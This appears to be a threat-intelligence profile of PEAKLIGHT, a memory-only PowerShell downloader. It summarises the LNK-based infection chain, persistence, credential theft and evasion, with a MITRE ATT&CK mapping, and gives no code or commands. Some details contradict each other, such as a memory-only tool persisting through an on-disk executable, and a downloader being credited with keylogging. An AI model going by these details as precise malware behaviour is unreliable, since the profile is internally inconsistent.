|
| |
| |
| Financial Gain
Cyberwarfare |
| |
| |
Overview
PEAKLIGHT is a sophisticated malware threat identified by Mandiant, which operates as a memory-only dropper and downloader, primarily targeting systems through a multi-stage infection process. Unlike traditional file-based malware, PEAKLIGHT is designed to evade detection by operating solely in memory, leaving minimal traces on disk. Its complex infection chain begins with a seemingly innocuous Microsoft Shortcut File (LNK), disguised as a movie or media file, which serves as the initial vector for executing the malware. Once executed, the LNK file triggers a PowerShell script that downloads a JavaScript-based dropper from a remote server. This dropper then decodes and executes a PowerShell-based downloader known as PEAKLIGHT, which is responsible for fetching further malicious payloads.
The threat actor behind
PEAKLIGHT employs advanced techniques to ensure its persistence and stealth. The malware leverages obfuscation and encryption mechanisms to conceal its true nature, making it difficult for traditional security tools to detect. Through its use of legitimate system tools such as PowerShell and mshta.exe, PEAKLIGHT bypasses many security controls, blending in with normal system operations. Additionally, it utilizes content delivery networks (CDNs) to host its malicious payloads, further complicating efforts to identify and block its traffic. The malware is versatile, capable of downloading a range of infostealers such as
LUMMAC.V2, SHADOWLADDER, and
CRYPTBOT, which are used to steal sensitive information from compromised systems.
Targets
Individuals
Information
How they operate
The initial phase of PEAKLIGHT’s operation typically begins with a phishing email, which contains a malicious link or attachment designed to exploit social engineering tactics. Commonly, PEAKLIGHT arrives in the form of a Windows Shortcut (LNK) file, which may masquerade as a harmless document or media file. When opened, the LNK file executes a PowerShell script, which in turn downloads and executes the malware payload. This initial execution stage ensures that PEAKLIGHT begins its operation silently, bypassing traditional antivirus detection by using obfuscation techniques and encrypting its code.
Once executed, PEAKLIGHT establishes persistence on the infected system. It does this by exploiting techniques such as modifying the system’s boot or logon processes to ensure that the malware re-launches upon system restart or user login. This is achieved through the modification of registry keys or the creation of scheduled tasks that point to PEAKLIGHT’s malicious executable. The malware’s persistence ensures it remains on the system even if the victim attempts to remove it, which complicates detection and eradication efforts by system administrators.
As PEAKLIGHT continues to run, it begins its data collection phase, gathering sensitive information from the compromised machine. This data may include user credentials, financial data, or other critical business information. The malware is equipped with input capture capabilities, allowing it to log keystrokes or intercept other forms of user input, such as password entries. PEAKLIGHT’s ability to quietly collect and store this data is enhanced by its use of encrypted channels, ensuring that the stolen information remains hidden from detection tools and is sent back to the attacker’s command-and-control (C2) server.
Furthermore, PEAKLIGHT employs advanced defense evasion techniques to avoid detection by both endpoint protection solutions and network security tools. One such technique is the use of obfuscated or encrypted payloads, which ensures that the malware remains undetected by signature-based detection systems. Additionally, PEAKLIGHT can disguise itself by masquerading as legitimate software, further minimizing the chances of discovery. This combination of evasion tactics makes PEAKLIGHT a challenging threat to mitigate, as it can operate under the radar for extended periods.
MITRE Tactics and Techniques
Initial Access (TA0001):
Phishing (T1566): PEAKLIGHT often arrives through a phishing email with malicious attachments, such as a seemingly harmless LNK file that acts as the initial access vector.
Valid Accounts (T1078): The malware may leverage valid user accounts to further its infection process or evade detection.
Execution (TA0002):
Command and Scripting Interpreter (T1059): PEAKLIGHT uses PowerShell scripts and JavaScript to execute malicious code. PowerShell (T1059.001) is used to run a script that downloads and executes the payloads.
MSHTA (T1170): MSHTA (Microsoft HTML Application Host) may also be used to run scripts from remote locations, which is another mechanism through which PEAKLIGHT executes its payloads.
Persistence (TA0003):
Boot or Logon Autostart Execution (T1547): PEAKLIGHT may configure persistence by adding itself to start-up routines or by modifying legitimate processes to run at system start.
Privilege Escalation (TA0004):
Exploitation for Privilege Escalation (T1068): PEAKLIGHT could potentially exploit vulnerabilities in the operating system or applications to escalate privileges, though this is more secondary compared to its initial infection and persistence mechanisms.
Defense Evasion (TA0005):
Obfuscated Files or Information (T1027): PEAKLIGHT uses techniques like obfuscation and encryption to hide its payloads and make its detection more difficult. This helps evade traditional signature-based detection methods.
Masquerading (T1036): The malware may disguise itself as legitimate software, such as a media file, to avoid suspicion.
Disable or Modify Tools (T1089): PEAKLIGHT can disable or avoid security tools to ensure its presence on the compromised system is not detected.
Credential Access (TA0006):
Input Capture (T1056): As part of its capabilities, PEAKLIGHT may collect user credentials and other sensitive data using infostealers like LUMMAC.V2 or SHADOWLADDER.
Exfiltration (TA0010):
Exfiltration Over Command and Control Channel (T1041): Once PEAKLIGHT collects sensitive data, it can exfiltrate the information over its command-and-control (C2) channels, often using encrypted or obfuscated traffic to evade detection.
References:
